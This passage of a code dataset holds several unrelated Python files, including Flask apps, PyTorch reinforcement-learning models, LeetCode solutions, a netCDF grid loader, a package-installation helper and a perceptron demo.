delete(id):\r\n poemsDAO.delete(id)\r\n return jsonify({\"done\":True})\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n app.run(debug= True)","sub_path":"Project/serverPoems.py","file_name":"serverPoems.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650209416","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nsys.setrecursionlimit(5000)\n\nN = int(sys.stdin.readline().rstrip())\n\nline = dict()\n\nfor j in range(N):\n a,b = tuple(map(int,sys.stdin.readline().rstrip().split()))\n try:\n line[a].append(b)\n except:\n line[a] = [b]\n try:\n line[b].append(a)\n except:\n line[b] = [a]\n\nvisit = [0 for i in range(N+1)]\n\nans = 0\npoint = 0\nchange = 0\n\ndef dfs(start,current,prev,visit):\n global ans,point,change\n next_line = line[current]\n for next in next_line:\n if next != prev:\n if visit[next] == -1 and next == start:\n ans = 1\n return\n elif visit[next] == -1 and next != start:\n ans = 2\n point = next\n return\n visit[next] = -1\n dfs(start,next,current,visit)\n if ans == 1:\n return\n elif ans == 2 and current == point and change == 0:\n change = 1\n return\n elif ans == 2 and current != point and change == 0:\n return\n elif change == 1:\n visit[current] = 0\n return\n visit[next] = 0\n\nvisit[1] = -1\ndfs(1,1,0,visit)\n\ndef dfs2(n,prev):\n if visit[n] !=0 and visit[n] != -1:\n return visit[n]\n\n next_line = line[n]\n min_ans = []\n if len(next_line) == 1 and next_line[0] == prev:\n return -5\n for next in next_line:\n if next != prev:\n if visit[next] == -1:\n min_ans.append(1)\n elif visit[next] != 0:\n min_ans.append(visit[next] + 1)\n else:\n ans = dfs2(next,n)\n if ans != -5:\n min_ans.append(ans+1)\n visit[n] = min(min_ans)\n return visit[n]\n\none_next = line[1]\n\none_count = 0\nfor o_n in one_next:\n if visit[o_n] == -1:\n one_count +=1\nif one_count < 2:\n visit[1] = 0\n\nfor n in range(1,N+1):\n if len(line[n]) == 1:\n dfs2(n,0)\n\nfor i in range(1,N+1):\n if visit[i] == -1:\n if i !=N:\n print(0,end=' ')\n else:\n print(0)\n else:\n if i!=N:\n print(visit[i],end=' ')\n else:\n print(visit[i])","sub_path":"서울 지하철 2호선!.py","file_name":"서울 지하철 2호선!.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"323727875","text":"\"\"\"A simple crud app to facilitate borrowing digital items\n (books, movies, music and possibly others between several users\"\"\"\nimport os\nimport warnings\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\ndb = SQLAlchemy(app)\n\n\nclass Item(db.Model):\n # This class has all entries for the items table\n # An item can be more than once, if more users have made it\n # available\n\n __tablename__ = 'items'\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The title of the item (book title, CD/record title, movie title)\n title = db.Column(db.String(64))\n\n # The description of the item (track listing for music, plot synopsis for\n # movie or book)\n description = db.Column(db.Text(64))\n\n # Whether the item is available or not (Probably don't need that.\n # If the borrower_id not None, then it is available)\n # available = db.Column(db.Boolean)\n\n # The category of the item ('movie', 'music', 'book')\n category = db.Column(db.String(64))\n\n # The author, artist/ band or director id\n artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'))\n\n # An object oriented view of the relationship between\n # an item and the user who owns it.\n # E.g. Given an instance of class Item, the owner\n # attribute gives its owner\n owns = db.relationship('Own', backref='owner', uselist=False)\n\n # An object oriented view of the relationship between\n # an item and the user who's borrowed it.\n # E.g. Given an instance of class Item, the lender\n # attribute gives its lender\n borrows = db.relationship('Borrow', backref='lender', uselist=False)\n\n def __repr__(self):\n return f'<{self.title}>'\n\n\nclass Artist(db.Model):\n # This class has all the entries for the artists table\n __tablename__ = 'artists'\n\n # The id of the artist\n id = db.Column(db.Integer, primary_key=True)\n\n # The first name of the artist\n first_name = db.Column(db.String(64))\n\n # The last name of the artist\n last_name = db.Column(db.String(64))\n\n\n # An object oriented view of the relationship between\n # an item and the artist who created it.\n # E.g. Given an instance of class Artist, the items\n # attribute gives the list of items associated with it.\n items = db.relationship('Item', backref='artist', lazy=\"dynamic\")\n\n def __repr__(self):\n return f'<{self.first_name} {self.last_name}>'\n\n\nclass Own(db.Model):\n # This class has all the entries for the users table\n __tablename__ = 'owns'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The name of the user that owns the item\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # The datetime when the item was registered by the user\n # datetime = db.Column(db.DateTime)\n\n # The id of the item being registered as available\n item_id = db.Column(db.String(64), db.ForeignKey('items.id'))\n\n def __repr__(self):\n return f'User with id {self.user_id} registered item with id {self.item_id}'\n\n\nclass Borrow(db.Model):\n # This class has all the entries for the borrowers table\n __tablename__ = 'borrows'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The name of the user that owns the item\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # The datetime when the item was borrowed by the user\n # datetime = db.Column(db.DateTime)\n\n # The id of the item being borrowed\n item_id = db.Column(db.String(64), db.ForeignKey('items.id'))\n\n def __repr__(self):\n return f'User with id {self.user_id} borrowed item with id {self.item_id}'\n\n\nclass User(db.Model):\n # This class has all the entries for the users\n __tablename__ = 'users'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The username with which the user is registering\n username = db.Column(db.String(64), unique=True)\n\n # The user's first name\n first_name = db.Column(db.String(64))\n\n # The user's last name\n last_name = db.Column(db.String(64))\n\n # An object oriented view of the relationship between\n # a user and the items he owns.\n # E.g. Given an instance of class User, the owns\n # attribute gives the list of items it owns.\n owns = db.relationship('Own', backref='user')\n\n # An object oriented view of the relationship between\n # a user and the items he owns.\n # E.g. Given an instance of class User, the owns\n # attribute gives the list of items it's borrowed.\n borrows = db.relationship('Borrow', backref='user')\n\n def __repr__(self):\n return f'{self.username}'\n\n\nwith __name__ == '__main__':\n # Example on how to create the several entries in the db\n\n # Create a user\n mia_maja = User(username=\"Mia_M\",\n first_name=\"Mia Maja\",\n last_name=\"Holst Manstrup\")\n\n # Create an item\n everyman = Item(title=\"Everyman\",\n description=\"The book begins at the funeral of \"\n \"its protagonist. The remainder of the \"\n \"book, which ends with his death, looks \"\n \"mournfully back on episodes from his life, \"\n \"including his childhood, where he and his\"\n \" older brother, Howie, worked in his father's\"\n \" shop, Everyman's Jewelry Store. He has been \"\n \"married three times, with two sons from his \"\n \"first marriage who resent him for leaving their \"\n \"mother, and one daughter from his second marriage \"\n \"who treats him with kindness and compassion, though \"\n \"he divorced her mother after beginning an affair \"\n \"with a 24-year-old Danish model, who subsequently \"\n \"became his third wife. Having divorced her as well, \"\n \"he has moved in his old age to a retirement community\"\n \" at the New Jersey shore, where he lives alone and \"\n \"attempts to paint, having passed up a career as an \"\n \"artist early in his life to work in advertising in \"\n \"order to support himself and his family. The book \"\n \"traces the protagonist's feelings as he gets \"\n \"increasingly old and sick, and his reflections of \"\n \"his own past, which has included his share of misdeeds \"\n \"and mistakes, as he ponders his impending death.\")\n\n # Create an artist\n philip_roth = Artist(first_name=\"Philip\", last_name=\"Roth\")\n\n # Assign the artist to the item\n everyman.artist = philip_roth\n\n # Assign a category to the item\n everyman.category = \"book\"\n\n # Assign an owner to the item\n everyman.owner = mia_maja\n\n # Create another user\n nikos_n = User(username=\"Nikos_N\",\n first_name=\"Nikos\",\n last_name=\"Nezeritis\")\n\n # Create another item\n white_nights = Item(title=\"White Nights\",\n description=\"The narrator describes his experience \"\n \"walking in the streets of St. Petersburg. \"\n \"He loves the city at night, and feels \"\n \"comfortable in it. He no longer feels \"\n \"comfortable during the day because all \"\n \"the people he is used to seeing are not there. \"\n \"He drew his emotions from them: if they were \"\n \"happy, he was happy; if they were despondent, \"\n \"he was despondent. New faces made him feel alone. \"\n \"As he walked, the houses would talk to him and tell \"\n \"him how they were being renovated or painted a new color \"\n \"or being torn down.\")\n # Create its artist\n fyodor_dostoevsky = Artist(first_name=\"Fyodor\", last_name=\"Dostoevsky\")\n\n # Assign the artist to the item\n white_nights.artist = fyodor_dostoevsky\n\n # Assign a category to the item\n white_nights.category = \"book\"\n\n # Assign an owner to the item\n white_nights.owner = nikos_n\n\n # One user borrows something from the other\n nikos_n.borrows = everyman\n\n # Add owner, artist and item to the db\n db.session.add_all([mia_maja, nikos_n, philip_roth, everyman])\n\n # Commit the db\n db.session.commit()\n\n # Query to see if every item, user and artist have the expected entries\n\n\n\n\n\n\n\n\n#class UserAction:\n \"\"\"\n A class that reads a User, an Action and an Item object\n and implements either a give, a return or a take action\n TODO: Re-write this as a function maybe\n \"\"\"\n # def __init__(self,\n # User: User,\n # Action: Action,\n # Item: Item,\n # type_of_action: str):\n # self.User = User\n # self.Action = Action\n # self.Item = Item\n # self.type_of_action = type_of_action\n\n #def act(self):\n # Action.action = self.type_of_action\n # Action.user_id = User.id\n # Action.item_id = Item.id\n\n # if self.type_of_action not in [\"give\", \"borrow\", \"return\"]:\n # raise ValueError(\"This action is not available\")\n # elif self.type_of_action == \"give\":\n # If the user wants to give this item, they should be added in\n # the item's owner_id entry\n # Item.owner_id = Action.user_id\n # elif self.type_of_action == \"borrow\":\n # If the user wants to borrow this item, they should be added in\n # the item's owner_id entry\n # if Item.owner_id == Action.user_id:\n # warnings.warn(\"You own this item already\")\n # else:\n # if Item.available:\n # Item.borrower_id = Action.user_id\n # else:\n # warnings.warn(\"This item is not available\")\n\n\n\n# A user cannot borrow more items of a certain category\n# than the closest number to half the items of this category they have\n# made available. If they attempt to do so, a warning should be issued\n# and the action shouldn't be allowed\n\n# We want to have a page with a log of all the actions that users did, with the respective\n# timesteps\n\n# We want to have separate pages for books, records, movies\n# For each item, the user can browse and see a picture of it and its synopsis\n\n# For the future: If a user keeps an item longer than they should, an email should be\n# sent to them.\n\n# Users should register using an html form\n\n# For the future: A user should also have the right to withdraw an item\n# If an item gets withdrawn, the whole row gets removed.\n# If it was borrowed and it gets returned, the borrower_id becomes None\n\n\n# In order for someone to become a borrower, they should first have\n# provided some item. So, we have to make sure that when a user wants to\n# borrow something, they are already owners of something else\n","sub_path":"item_borrowing.py","file_name":"item_borrowing.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"477455415","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom configs import *\nfrom lib import dqn_model, common\n\n\nclass BaseModel(nn.Module):\n def __init__(self, input_dim, output_dim):\n super(BaseModel, self).__init__()\n self.linear1 = nn.Linear(input_dim, 20)\n self.relu = nn.ReLU()\n self.linear2 = nn.Linear(20, output_dim)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n return self.linear2(x)\n\nclass Base_QR_DQN_Model(nn.Module):\n def __init__(self, input_dim, output_dim, n_quant):\n super(Base_QR_DQN_Model, self).__init__()\n self.n_quant = n_quant\n self.n_action = output_dim\n self.linear1 = nn.Linear(input_dim, 64)\n self.linear2 = nn.Linear(64, 32)\n self.relu = nn.ReLU()\n self.linear3 = nn.Linear(32, output_dim * n_quant)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n x= torch.tanh(self.linear2(x))\n return self.linear3(x).view(-1, self.n_action, self.n_quant)\n\nclass Noisy_QR_DQN_Model(nn.Module):\n def __init__(self, input_dim, output_dim, n_quant):\n super(Noisy_QR_DQN_Model, self).__init__()\n self.n_quant = n_quant\n self.n_action = output_dim\n self.linear1 = dqn_model.NoisyLinear(input_dim, 64)\n self.linear2 = dqn_model.NoisyLinear(64, 32)\n self.relu = nn.ReLU()\n self.linear3 = dqn_model.NoisyLinear(32, output_dim * n_quant)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n x= torch.tanh(self.linear2(x))\n return self.linear3(x).view(-1, self.n_action, self.n_quant)\n\n\n\nclass RainbowDQN(nn.Module):\n def __init__(self, input_dim, output_dim):\n super(RainbowDQN, self).__init__()\n self.fc_val = nn.Sequential(\n dqn_model.NoisyLinear(input_dim, 256),\n nn.ReLU(),\n dqn_model.NoisyLinear(256, N_ATOMS)\n )\n self.fc_adv = nn.Sequential(\n dqn_model.NoisyLinear(input_dim, 256),\n nn.ReLU(),\n dqn_model.NoisyLinear(256, output_dim * N_ATOMS)\n )\n self.register_buffer(\"supports\", torch.arange(Vmin, Vmax + DELTA_Z, DELTA_Z))\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, x):\n batch_size = x.size()[0]\n val_out = self.fc_val(x).view(batch_size, 1, N_ATOMS)\n adv_out = self.fc_adv(x).view(batch_size, -1, N_ATOMS)\n adv_mean = adv_out.mean(dim=1, keepdim=True)\n return val_out + (adv_out - adv_mean)\n\n def both(self, x):\n cat_out = self(x)\n probs = self.apply_softmax(cat_out)\n weights = probs * self.supports\n res = weights.sum(dim=2)\n return cat_out, res\n\n def qvals(self, x):\n return self.both(x)[1]\n\n def apply_softmax(self, t):\n return self.softmax(t.view(-1, N_ATOMS)).view(t.size())\n\n\nclass FRAPModel(nn.Module):\n def __init__(self, relations):\n super(FRAPModel, self).__init__()\n self.demand_embedding = nn.Linear(2, 4)\n self.conv2d1 = nn.Conv2d(in_channels=8, out_channels=20, kernel_size=(1,1),stride=(1,1))\n self.relations = torch.tensor(relations) # (1, 8, 7)\n self.relation_embedding = nn.Embedding(2, 4)\n self.relation_conv2d = nn.Conv2d(in_channels=4, out_channels=20, kernel_size=(1,1), stride=(1,1))\n self.conv2d2 = nn.Conv2d(in_channels=20, out_channels=20, kernel_size=(1,1), stride=(1,1))\n self.conv2d3 = nn.Conv2d(in_channels=20, out_channels=1, kernel_size=(1,1), stride=(1,1))\n\n def forward(self, ob):\n '''\n :param ob: [bsz, 8, 2]\n :return: distribution of actions\n '''\n bsz = ob.shape[0]\n demands = self.demand_embedding(ob.reshape(-1, 2)).reshape(bsz, 8, 4)\n # demand: [bsz, 8, 4]\n pair_representation = torch.zeros([bsz, 8, 7, 8])\n for i, demand in enumerate(demands):\n # demand: [8, 4]\n for s in range(8):\n count = 0\n for k in range(8):\n if k == s: continue\n pair_representation[i][s][count] = torch.cat([demand[s], demand[k]])\n count += 1\n\n # pair_representation: (bsz, 8, 7, 8) -> (bsz, 8, 8, 7) --> x: (bsz, 20, 8, 7)\n x = self.conv2d1(pair_representation.permute(0, 3, 1, 2))\n\n # Phase competition mask\n phase_cometition_mask = self.relation_embedding(self.relations).permute(0, 3, 1, 2) # (1, 4, 8, 7)\n phase_cometition_mask = self.relation_conv2d(phase_cometition_mask) # (1, 20, 8, 7)\n\n x = x * phase_cometition_mask # (bsz, 20, 8, 7)\n x = self.conv2d2(x)\n x = self.conv2d3(x) # (bsz, 1, 8, 7)\n x = x.squeeze() # (bsz, 8, 7)\n x = torch.sum(x, dim=-1)\n return x\n\n\nclass CoLightModel(nn.Module):\n def __init__(self, input_dim, output_dim, agent_list=None):\n super(CoLightModel, self).__init__()\n self.observation_proj = nn.Linear(input_dim, 32)\n self.obs_inner_agent_proj = nn.Linear(32, 16)\n self.obs_outer_agent_proj = nn.Linear(32, 16)\n self.cooperation_proj = nn.Linear(16, 16)\n self.final_proj = nn.Linear(16, output_dim)\n\n def forward(self, obs):\n '''\n :param obs:\n \"ob_embedding\": embedding for current intersection observation, torch.tensor\n \"lane_vehicle_num\": no need to explain\n \"lane_vehicle_speed\": no need to explain\n \"adjacency\": the ob_embedding of adjacency intersections, torch.tensor\n :return: action\n '''\n\n print(\"obs:\", obs)\n\n inner_ob_embedding = self.obs_inner_agent_proj(obs['ob_embedding'])\n\n interaction_scores = []\n\n for adj_ob_embedding in obs['adjacency']:\n interaction_score = torch.dot(inner_ob_embedding.reshape(-1), self.obs_outer_agent_proj(adj_ob_embedding).reshape(-1))\n interaction_scores.append(interaction_score)\n interaction_scores = torch.stack(interaction_scores)\n interaction_scores = F.softmax(interaction_scores, dim=0)\n\n adj_ob_embeddings = torch.stack(obs['adjacency'])\n cooperation_adj = torch.sum(self.cooperation_proj(adj_ob_embeddings) * interaction_scores.unsqueeze(1), dim=0)\n self.final_proj(cooperation_adj.unsqueeze(0))\n\n\n","sub_path":"agent_rainbow/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364071706","text":"# https://leetcode-cn.com/problems/rotate-image/\r\n# 实现顺时针90度的旋转效果:\r\n# Flip: 沿水平中线上下翻转(-180° + 一次镜像)\r\n# Transpose: 沿右上 - 左下的对角线翻转(270° + 一次镜像)\r\n\r\n\r\nclass Solution(object):\r\n def rotate(self, matrix):\r\n if len(matrix) == 0:\r\n return\r\n\r\n h = w = len(matrix) # h是纵列\r\n # 沿中轴线翻转\r\n for i in range(0, h):\r\n for j in range(int(w / 2)): # 3*3数组:int(w/2)=1,相当只进行了j=0这一组\r\n # print(matrix[i][j], matrix[i][w-j-1]) # w = 3, j in ranger(2), w-j-1 = 1 and 2\r\n matrix[i][j], matrix[i][w - j - 1] = matrix[i][w - j -\r\n 1], matrix[i][j]\r\n\r\n # 沿左下-右上的对角线翻转\r\n for i in range(h):\r\n for j in range(w - 1 - i):\r\n print(matrix[i][j], matrix[w - 1 - j][h - 1 - i], 'w-1-i =',\r\n w - 1 - i)\r\n matrix[i][j], matrix[w - 1 - j][h - 1 -\r\n i] = matrix[w - 1 -\r\n j][h - 1 -\r\n i], matrix[i][j]\r\n\r\n\r\nmatrix = [\r\n [1, 2, 3],\r\n [4, 5, 6],\r\n [7, 8, 9],\r\n]\r\n\r\n# step1\r\n# [3, 2, 1]\r\n# [6, 5, 4]\r\n# [9, 8, 7]\r\n\r\n# step2\r\n# 3 7 w-1-i = 2\r\n# 2 4 w-1-i = 2\r\n# 6 8 w-1-i = 1\r\n\r\n# out\r\n# [7, 4, 1]\r\n# [8, 5, 2]\r\n# [9, 6, 3]\r\n\r\nSolution().rotate(matrix)\r\n","sub_path":"048-1-Rotate Image.py","file_name":"048-1-Rotate Image.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167445670","text":"# module load_grid\nimport netCDF4 as nc\n\nimport numpy as np\n#from scipy.interpolate.fitpack2 import SmoothBivariateSpline\n\n__version__ = '0.1'\n\ndef load_grid(files):\n\t'''\nload_grid returns a dictionary of netCDF4 variables. The actual extraction of the data in them from\nthe netCDF file must be done by the user, hopefully at the last minute, so as to reduce the amount\nof wasted memory.\n\t'''\n\tif files.__class__ == str:\n\t\tf = files\n\telif files.__class__ == list:\n\t\tf = files[0]\n\telse:\n\t\traise TypeError('wrong type sent to load_grid')\n\t\treturn False\n\t\n\tncf = nc.Dataset(f,mode='r')\n\t\n\tG = {}\n\tG['ncfile'] = ncf\n\tG['lon'] = ncf.variables['lon_rho']\n\tG['lat'] = ncf.variables['lat_rho']\n\tG['lonu'] = ncf.variables['lon_u']\n\tG['latu'] = ncf.variables['lat_u']\n\tG['lonv'] = ncf.variables['lon_v']\n\tG['latv'] = ncf.variables['lat_v']\n\tG['cs'] = ncf.variables['Cs_r']\n\tG['csw'] = ncf.variables['Cs_w']\n\t\n\tG['mask'] = ncf.variables['mask_rho']\n\tG['masku'] = ncf.variables['mask_u']\n\tG['maskv'] = ncf.variables['mask_v']\n\t\n\tG['H'] = ncf.variables['h']\n#\tG['Hu'] = griddata(G['lat'].reshape(G['lat'].size),G['lon'].reshape(G['lon'].size),G['H'].reshape(G['H'].size),G['latu'],G['lonu'])\n#\tG['Hv'] = griddata(G['lat'].reshape(G['lat'].size),G['lon'].reshape(G['lon'].size),G['H'].reshape(G['H'].size),G['latv'],G['lonv'])\n\treturn G\n","sub_path":"ROMS/pmacc/tools/post_tools/rompy/tags/rompy-0.1/rompy/load_grid.py","file_name":"load_grid.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210146268","text":"from __future__ import print_function\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\nfrom classes import run, clear\nfrom collections import Iterable\n\n# Packages to install\nsys_packages = [\n \"nginx\",\n \"postgresql\",\n \"postgresql-server-dev-all\",\n \"python-pip\",\n \"python-virtualenv\",\n \"python3.3-dev\",\n \"sphinxsearch\" # Search engine\n \"uwsgi\",\n \"uwsgi-plugin-python3\",\n]\npip_pkgs = [\n \"South\", # Migrations\n \"beautifulsoup4\", # Html\n \"django\",\n \"fabric\", # Quick deployment\n \"nose\", # Tests\n \"pillow\", # PIL (image manipulation)\n \"psycopg2\", # Postgres binding\n \"python3-memcached\", # Memcache\n \"pytz\", # Time zones\n \"requests\", # GET/POST\n \"uwsgi\", # Backend server\n \"django-nose\", # nose tests\n \"django-hstore\", # PostgreSQL hstore field type\n \"six\", # Python 2/3\n \"tl\",\n \"tl.rename\", # string manipulation\n \"ply\", # to create compilers / parsers\n \"tornado\", # async servers\n #\"bencode\", # Used in .torrent file format\n #\"BitTorrent-bencode\",\n]\n\n\nclass Pkg(object):\n def __init__(self, name):\n #if isinstance(pkgs, str):\n # self.pkgs = [pkgs]\n #else:\n # self.pkgs = pkgs\n self.name = name\n\n def install(self):\n print(\"{}... \".format(self.name), end=\"\")\n if self.installed:\n print(\"already installed\")\n else:\n run([\"sudo\", \"apt-get\", \"install\", \"-y\", self.name], out=True)\n print(\"OK\")\n #clear()\n\n @property\n def installed(self):\n p1 = Popen([\"dpkg\", \"-s\", self.name], stdout=PIPE)\n p2 = Popen([\"grep\", \"Status\"], stdin=p1.stdout, stdout=PIPE)\n return b'Status: install ok installed\\n' == p2.communicate()[0]\n\n\nclass PPA(object):\n def __init__(self, name):\n if name.startswith(\"ppa:\"):\n self.name = name[4:]\n else:\n self.name = name\n\n def add(self):\n if not self.added:\n run([\"sudo\", \"add-apt-repository\", \"ppa:\"+self.name], out=True)\n return True\n return False\n\n @property\n def added(self):\n # grep ^ /etc/apt/sources.list /etc/apt/sources.list.d/* | grep fogger\n print(self.name)\n p1 = Popen([\"grep\", \"^\", \"/etc/apt/sources.list\",\n #\"/etc/apt/sources.list.d/*\"\n ], stdout=PIPE)\n p2 = Popen([\"grep\", self.name], stdin=p1.stdout, stdout=PIPE)\n #print(p2.returncode)\n return p2.returncode == 0 or p2.returncode is None\n\n def __str__(self):\n return \"ppa:\"+self.name\n\n\nclass Pip(object):\n def __init__(self, pkgs, env=None):\n self.env = env\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n pip = \"pip\" if not self.env else os.path.join(self.env, \"bin\", \"pip\")\n for pkg in self.pkgs:\n run([pip, \"install\", pkg])\n clear()\n\n\nclass NPM(object):\n \"\"\"Nodejs packages\"\"\"\n def __init__(self, pkgs):\n #Pkg(\"npm\").install()\n Pkg(\"nodejs\").install()\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n # npm install -g coffee-script\n for name in self.pkgs:\n if self.installed1(name):\n print(name, \"installed\")\n else:\n run([\"sudo\", \"npm\", \"install\", \"-g\", name])\n\n def installed1(self, name):\n p1 = Popen([\"npm\", \"list\", \"-g\"], stdout=PIPE)\n p2 = Popen([\"grep\", name], stdin=p1.stdout, stdout=PIPE)\n return not b'' == p2.communicate()[0]\n\n\nclass Gem(object):\n \"\"\"Ruby packages\"\"\"\n def __init__(self, pkgs):\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n for name in self.pkgs:\n if self.installed1(name):\n print(\"gem\", name, \"...\", \"already installed\")\n else:\n run([\"sudo\", \"gem\", \"install\", name])\n\n def installed1(self, name):\n #gem query --name-matches '^sass$' --installed\n p = Popen([\"gem\", \"query\", \"--name-matches\",\n \"^%s$\" % name, \"--installed\"], stdout=PIPE)\n #print(\":\", p.communicate()[0])\n return b'true\\n' == p.communicate()[0]\n","sub_path":"install/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"135979254","text":"class Solution:\n\tdef canFinish(self, numCourses, prerequisites):\n\t\t\"\"\"\n\t\t:type numCourses: int\n\t\t:type prerequisites: List[List[int]]\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\t\tdic = {}\n\t\tfor i in prerequisites:\n\t\t\tif i[0] not in dic:\n\t\t\t\tdic[i[0]] = []\n\t\t\tdic[i[0]].append(i[1])\n\t\tvisited = []\n\t\tdef dfsWithAncestor(cur, trace):\n\t\t\tif cur in trace:\n\t\t\t\treturn False\n\t\t\tif cur in visited:\n\t\t\t\treturn True\n\t\t\tif cur not in dic:\n\t\t\t\treturn True\n\t\t\tvisited.append(cur)\n\t\t\ta = True\n\t\t\tfor b in dic[cur]:\n\t\t\t\ta = a and dfsWithAncestor(b, trace + [cur])\n\t\t\treturn a\n\t\tdefault = True\n\t\tfor key in dic:\n\t\t\tdefault = default and dfsWithAncestor(key, [])\n\t\treturn default\na = Solution()\nprint(a.canFinish(2, [[1,0],[0,1]]))\nprint(a.canFinish(2, [[1,0]]))\nprint(a.canFinish(3, [[1,0],[1,2],[0,1]]))\nprint(a.canFinish(4, [[0,1],[3,1],[1,3],[3,2]]))\nprint(a.canFinish(3, [[0,1],[0,2],[1,2]]))","sub_path":"207.py","file_name":"207.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"373865838","text":"#\r\n# @lc app=leetcode id=590 lang=python\r\n#\r\n# [590] N-ary Tree Postorder Traversal\r\n#\r\n# https://leetcode.com/problems/n-ary-tree-postorder-traversal/description/\r\n#\r\n# algorithms\r\n# Easy (64.37%)\r\n# Total Accepted: 19.6K\r\n# Total Submissions: 30.4K\r\n# Testcase Example: '{\"$id\":\"1\",\"children\":[{\"$id\":\"2\",\"children\":[{\"$id\":\"5\",\"children\":[],\"val\":5},{\"$id\":\"6\",\"children\":[],\"val\":6}],\"val\":3},{\"$id\":\"3\",\"children\":[],\"val\":2},{\"$id\":\"4\",\"children\":[],\"val\":4}],\"val\":1}'\r\n#\r\n# Given an n-ary tree, return the postorder traversal of its nodes' values.\r\n#\r\n# For example, given a 3-ary tree:\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# Return its postorder traversal as: [5,6,3,2,4,1].\r\n#\r\n#\r\n# Note:\r\n#\r\n# Recursive solution is trivial, could you do it iteratively?\r\n#\r\n#\r\n\"\"\"\r\n# Definition for a Node.\r\nclass Node(object):\r\n def __init__(self, val, children):\r\n self.val = val\r\n self.children = children\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def postorder(self, root):\r\n \"\"\"\r\n :type root: Node\r\n :rtype: List[int]\r\n \"\"\"\r\n if not root:\r\n return []\r\n # reinforced morris traverse, reverse of preorder\r\n # add a link from parent's current child's leftmost descendant to parent's previous child\r\n res = []\r\n while root:\r\n res.append(root.val)\r\n if not root.children:\r\n break\r\n else:\r\n for i in range(len(root.children)-1, 0, -1):\r\n curChildLeftMostDescendant = root.children[i]\r\n while curChildLeftMostDescendant.children:\r\n curChildLeftMostDescendant = curChildLeftMostDescendant.children[0]\r\n curChildLeftMostDescendant.children = [\r\n root.children[i - 1]]\r\n root = root.children[-1]\r\n # need to reverse result\r\n return res[::-1]\r\n","sub_path":"Easy/590.n-ary-tree-postorder-traversal.py","file_name":"590.n-ary-tree-postorder-traversal.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42248286","text":"'''\nCreated on Apr 8, 2013\n\nlinearly separate random points on the plane [-1,1]X[-1,1]\n \n@author: debajyoti\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n#run with more numPoints and less numEpochs for better visualisation \nnumPoints = 10\nnumEpochs = 100\nshowN = 20\naverageIteration = 0\n\n#turn on interactive mode \nplt.ion()\n\n#plot basic axes \nplt.axis([-1, 1, -1, 1])\nplt.axes().set_aspect('equal')\nplt.show()\n \n \n## generate 2 random points to form a line\nlineX = np.random.uniform(-1, 1, 2)\nlineY = np.random.uniform(-1, 1, 2)\n \n\n#form the line using 2-point form method \ndef makeLine(x):\n return lineX[1] + (lineY[1] - lineX[1]) / (lineY[0] - lineX[0]) * ( x - (lineX[0]))\n \n#plot the line, red\nplt.plot( [-1,1],[makeLine(-1),makeLine(1)] ,'b')\n#ax=fig.add_subplot(2,2,1)\n\n#classify as 1 or -1\ndef classifyPoint(point):\n if point[2] > makeLine(point[1]):\n return 1\n else:\n return -1\n \n \n\nepoch = 0\nwhile epoch < numEpochs :\n \n ## generate sample points\n points = np.random.uniform(-1,1,(numPoints,2))\n zeros = np.ones( (numPoints,1) )\n points = np.append(zeros, points, axis = 1)\n \n for p in points:\n if classifyPoint(p) == 1:\n if(epoch % showN == 0):\n plt.plot( p[1], p[2], 'bo' )\n else:\n if(epoch % showN == 0):\n plt.plot( p[1], p[2], 'go' )\n \n plt.draw()\n \n #initialize weight vector\n w = np.zeros( 3 )\n \n iteration = 0\n \n done = False\n while not done:\n iteration += 1\n wrongPoints = 0\n print (\"Weights :\" +str(w))\n 